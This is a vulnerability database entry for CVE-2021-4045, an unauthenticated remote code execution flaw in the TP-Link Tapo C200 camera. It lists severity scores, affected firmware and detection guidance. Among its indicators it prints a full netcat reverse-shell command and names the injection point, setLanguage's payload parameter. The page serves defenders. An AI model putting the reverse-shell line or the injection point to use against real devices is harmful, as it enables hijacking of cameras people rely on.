cbcvebase.
CVE-2021-4045
published 2022-03-10

CVE-2021-4045: TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary…

PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
72.84%
99.4th percentile
TP-Link Tapo C200 IP camera, on its 1.1.15 firmware version and below, is affected by an unauthenticated RCE vulnerability, present in the uhttpd binary running by default as root. The exploitation of this vulnerability allows an attacker to take full control of the camera.

Affected

2 ranges
VendorProductVersion rangeFixed in
tp-linktapo_c2001.15 – 1.15
tp-linktapo_c200_firmware<= 1.1.15

Detection & IOCsextracted from sources · hover to see the quote

port443
port1337
urlhttps://<victim>:443/
commandrm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc %s %d >/tmp/f
processuhttpd
  • Detect HTTP POST requests to the root path (/) on port 443 of the camera containing a JSON body with method 'setLanguage' and a params.payload field — this is the exploit trigger for CVE-2021-4045.
  • Alert on shell metacharacter injection (semicolons, pipe characters, single quotes) inside the 'payload' parameter of a setLanguage JSON method call to the camera's HTTPS interface.
  • Monitor for outbound netcat (nc) reverse-shell connections originating from the camera process uhttpd, particularly to attacker-controlled hosts on port 1337.
  • Detect creation of a named pipe at /tmp/f on the camera filesystem, which is a strong indicator of reverse-shell staging activity associated with this exploit.
  • The vulnerable process (uhttpd) runs as root by default; any child process (e.g., /bin/sh) spawned by uhttpd should be treated as a high-severity anomaly.
  • ·The exploit uses verify=False (TLS certificate verification disabled), meaning the camera's self-signed certificate will not block exploitation; network-level TLS inspection may not reliably detect this traffic.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.010.0CRITICALAV:N/AC:L/Au:N/C:C/I:C/A:C
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.